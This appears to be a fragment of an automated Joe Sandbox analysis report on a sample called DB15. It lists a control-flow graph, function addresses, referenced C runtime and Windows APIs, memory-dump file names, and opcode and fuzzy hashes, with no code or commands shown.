                                                                                                                                                                                                                                        control_flow_graph 300 288f030-288f078 call 28a0160 call 2894914 call 287d040 308 288f080-288f086 300->308 309 288f090-288f0c2 call 289bdc0 call 287cea0 308->309 314 288f0ce-288f112 309->314 315 288f0c4-288f0c9 309->315 319 288f118-288f11d 314->319 320 288f114-288f116 314->320 316 288f3bf-288f3e0 call 2894690 315->316 324 288f42d-288f46c 316->324 325 288f3e2-288f3e6 316->325 323 288f120-288f129 319->323 322 288f12f-288f158 call 2886480 call 28925a2 320->322 341 288f15e-288f197 call 2885030 call 287e6e0 322->341 342 288f222-288f285 call 2886480 call 2884990 call 28832a0 call 2886370 322->342 323->323 326 288f12b-288f12d 323->326 362 288f46e 324->362 363 288f48f-288f4b2 324->363 328 288f7ca-288f7da call 28824b0 325->328 329 288f3ec-288f401 325->329 326->322 339 288f7dc-288f7df 328->339 340 288f7ed-288f822 call 287f8f0 328->340 329->309 336 288f407-288f428 329->336 336->309 339->308 349 288f826-288f82c 340->349 364 288f199-288f19e 341->364 365 288f20f-288f214 341->365 399 288f293-288f2b7 342->399 400 288f287-288f290 call 2892f27 342->400 353 288f82e-288f830 349->353 354 288f832-288f834 349->354 359 288f840-288f84f call 2884840 353->359 360 288f837-288f83c 354->360 359->349 387 288f851-288f883 call 287f8f0 359->387 360->360 366 288f83e 360->366 369 288f470-288f478 362->369 370 288f4b8-288f4bf 363->370 371 288f4b4-288f4b6 363->371 374 288f1ac-288f1c7 364->374 375 288f1a0-288f1a9 call 2892f27 364->375 365->342 380 288f216-288f21f call 2892f27 365->380 366->359 378 288f47a-288f487 369->378 379 288f48b 369->379 373 288f4c2-288f4c7 370->373 372 288f4cb-288f4ef call 2886070 call 28832a0 371->372 407 288f4f1 372->407 408 288f4f3-288f506 372->408 373->373 381 288f4c9 373->381 384 288f1c9-288f1cd 374->384 385 288f1e2-288f1e8 374->385 375->374 378->369 402 288f489 378->402 379->363 380->342 381->372 392 288f1ee-288f20c 384->392 393 288f1cf-288f1e0 call 2890f40 384->393 385->392 406 288f887-288f88d 387->406 392->365 393->392 413 288f2b9-288f2c0 399->413 414 288f2e3-288f31a 399->414 400->399 402->363 410 288f88f-288f891 406->410 411 288f893-288f895 406->411 407->408 425 288f508-288f511 call 2892f27 408->425 426 288f514-288f584 call 2891602 call 289bdc0 call 2894690 408->426 415 288f8a1-288f8b0 call 2884840 410->415 416 288f898-288f89d 411->416 413->414 418 288f2c2-288f2ce 413->418 436 288f38c-288f3a8 414->436 437 288f31c-288f334 414->437 415->406 428 288f8b2-288f8ec call 2884990 call 28832a0 415->428 416->416 417 288f89f 416->417 417->415 421 288f2d0-288f2d5 418->421 422 288f2d7 418->422 427 288f2dc 421->427 422->427 425->426 471 288f5dd-288f637 426->471 472 288f586-288f58a 426->472 427->414 445 288f8ee 428->445 446 288f8f0-288f908 428->446 452 288f3aa-288f3b3 call 2892f27 436->452 453 288f3b6-288f3b9 436->453 437->436 447 288f336-288f362 call 2892a56 437->447 445->446 456 288f90a-288f913 call 2892f27 446->456 457 288f916-288f953 call 2884990 call 28832a0 446->457 447->436 464 288f364-288f389 call 28934a2 call 28943d8 447->464 452->453 453->316 456->457 473 288f955 457->473 474 288f957-288f966 457->474 464->436 503 288f639 471->503 504 288f65f-288f67d 471->504 472->328 476 288f590-288f5b1 472->476 473->474 483 288f968-288f971 call 2892f27 474->483 484 288f974-288f980 474->484 476->309 482 288f5b7-288f5d8 476->482 482->308 483->484 488 288f98e-288f9a8 484->488 489 288f982-288f98b call 2892f27 484->489 490 288f9aa-288f9b3 call 2892f27 488->490 491 288f9b6 488->491 489->488 490->491 497 288f9ba-288f9d0 491->497 505 288f640-288f648 503->505 506 288f67f-288f681 504->506 507 288f683-288f68d 504->507 508 288f64a-288f657 505->508 509 288f65b 505->509 510 288f699-288f6bb call 2886070 call 28832a0 506->510 511 288f690-288f695 507->511 508->505 516 288f659 508->516 509->504 519 288f6bd 510->519 520 288f6bf-288f6d5 510->520 511->511 512 288f697 511->512 512->510 516->504 519->520 522 288f6e3-288f74b call 2891602 call 289bdc0 520->522 523 288f6d7-288f6e0 call 2892f27 520->523 534 288f75c-288f761 522->534 535 288f74d-288f756 522->535 523->522 536 288f7b0-288f7b2 534->536 537 288f763-288f784 534->537 535->534 543 288f7e4-288f7e8 535->543 538 288f7bd-288f7bf 536->538 539 288f7b4-288f7ba call 289158d 536->539 537->309 547 288f78a-288f7ab 537->547 538->328 542 288f7c1-288f7c7 call 289158d 538->542 539->538 542->328 543->497 547->308
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 430003804-123907689
                                                                                                                                                                                                                                        • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                                                                                                                        • Instruction ID: de704cf9739c88a88f22a96773ed9d247c0cd9f3916d8cdbe99ccdcec4bdf4f7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E642D279508380ABDB20EF24CC48B9B7BE9BF95308F44092DF589D7191EB759509CBA3
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0288A930 Relevance: 10.3, APIs: 3, Strings: 2, Instructions: 1565COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: <$x2Q
                                                                                                                                                                                                                                        • API String ID: 2102423945-643667464
                                                                                                                                                                                                                                        • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                                                                                                                        • Instruction ID: 341c99093b60cb101939806d27a6231d842638619b0aa178607087c13e164ff7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CD2AF7D504341ABD724FF28D894B9ABBE6BF84708F04092DE489D7291EB71A509CF93
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028800D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                                                                                                        • Instruction ID: 72f9bf0c294148dc6f2cff6e7268c134d5b5e37ec25228ccc9ad33dd290e94c2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D527F79D00218DBDF20EFA8D885BDEB7B5BF04308F148169D419E7251E735AA49CFA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287E6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0287E72D
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0287E756
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0287E784
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: std::exception::exception.LIBCMT ref: 028BFC1F
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: __CxxThrowException@8.LIBCMT ref: 028BFC34
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: std::exception::exception.LIBCMT ref: 028BFC4D
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: __CxxThrowException@8.LIBCMT ref: 028BFC62
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: std::regex_error::regex_error.LIBCPMT ref: 028BFC74
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: __CxxThrowException@8.LIBCMT ref: 028BFC82
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: std::exception::exception.LIBCMT ref: 028BFC9B
                                                                                                                                                                                                                                          • Part of subcall function 028BFC0C: __CxxThrowException@8.LIBCMT ref: 028BFCB0
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0287EA0C
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0287EE5C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1338678108-0
                                                                                                                                                                                                                                        • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                                                                                                        • Instruction ID: e5b015f9f39deab8dacfedec4fdca703c2f1138d024bc43df14ddfd8a043f1fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6452C179A002199FDF24CF68C8947AEBBF5BF44304F1845A9E84AEB281D731E945CF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02880B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                                                                                                        • Instruction ID: 642eb010dcc027b0914dc9bafcfc71b8cc3c3b5aad5f63373fa78493aad7ac75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E424D79D00208DBDF14EFA8D948BDEB7B5BF04308F244169D419E7290EB35AA49CFA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287DBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                                                        • Instruction ID: 450e7bb339635f6249959f92b246fa0c241493b793a0078cc7f495bd9605ce80
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59524078E00249DFDB50DBA8C844FAEBBB5BF49704F148598E509EB290DB31ED45CBA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00408268 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00408FB1,0041237C,00000001,?,004090C8,0041237C,00000017), ref: 0040826D
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041237C,?,00408FB1,0041237C,00000001,?,004090C8,0041237C,00000017), ref: 00408276
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2819765646.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819745102.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819807945.0000000000417000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819826696.0000000000418000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819826696.000000000041C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819898374.00000000004B7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819898374.0000000000B5C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2820113066.0000000000B5E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: e42a7b3de3cd97ed39356a8d62c030708aa03a3964ba82e14acc722fe257a155
                                                                                                                                                                                                                                        • Instruction ID: dab832adf2750ebaf91f4c31c16734b2f33f8f3c68fce56cf63f8936c8074565
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e42a7b3de3cd97ed39356a8d62c030708aa03a3964ba82e14acc722fe257a155
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47B0923104420CBBCB012BE1ED09B987F68EB09762F008020F64D48061CBB794908A99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028F22C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                        • API String ID: 0-3993045852
                                                                                                                                                                                                                                        • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                                                                                                        • Instruction ID: 8e8031a4b21459442d385f7316ba63bf03bfc89b0d29b4b1b6faeb5472c1ab34
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E33263B8E0022D9AEF619F64CC45BAEB779FF44704F1441EAEA0CE6151DB748A80CF59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00408A9A Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00403F9A,00415D28,00000014), ref: 00408A9A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2819765646.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819745102.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819807945.0000000000417000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819826696.0000000000418000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819826696.000000000041C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819898374.00000000004B7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2819898374.0000000000B5C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000B.00000002.2820113066.0000000000B5E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: 46b35877afea02c7c13aecc2a71cf176c0f22df61bb392d78d706784bb724142
                                                                                                                                                                                                                                        • Instruction ID: 12bc3d92e81e4d34dcc5d18e8f8281cae1e69440f13d116f5e8ae429e61e5497
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46b35877afea02c7c13aecc2a71cf176c0f22df61bb392d78d706784bb724142
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AB012B07061064747090B387C1806B35E4674C301300417DB003C1160DF60C8509A0C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02875DF7 Relevance: .7, Instructions: 723COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                                                                                                                        • Instruction ID: 20adb179031ec6b4261c3e977ede7b1450be5f530d3ed29bf81393bb321cd2c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D42B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287A026 Relevance: .5, Instructions: 478COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                                                                                                                        • Instruction ID: b86634788dd9c860c83370774aa2b7f920cd3f05a78fd8651b9e0ffceb894a95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F522CF7A904B168FC714CF19D08065AF7E1FF88324F158A6EE9A9A7B10D730FA55CB81
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02872B60 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                                                                                                        • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02873520 Relevance: .4, Instructions: 427COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                                                                                                                                                        • Instruction ID: 15130cf622c85e11995f6d7b4c8362268c661aa1eed253178f74a982e583a14b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77028D751187058FC756EE1CD49035AF3E2FFC8309F198A2CD68987B64E739A9198F82
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028789D0 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                                                                                                                        • Instruction ID: 0b53711f232aeaa5c3d5752a9893104caaf76f2188afce351e6ecba4d06343f8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EC12833E2477906D764DEAE8C540AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287B0B0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                                                                                        • Instruction ID: 6936211c62de771b5d5bc5b62419d46f27e70423d0eebff3af592b9bc9ab08fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59A1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028730F0 Relevance: .3, Instructions: 336COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
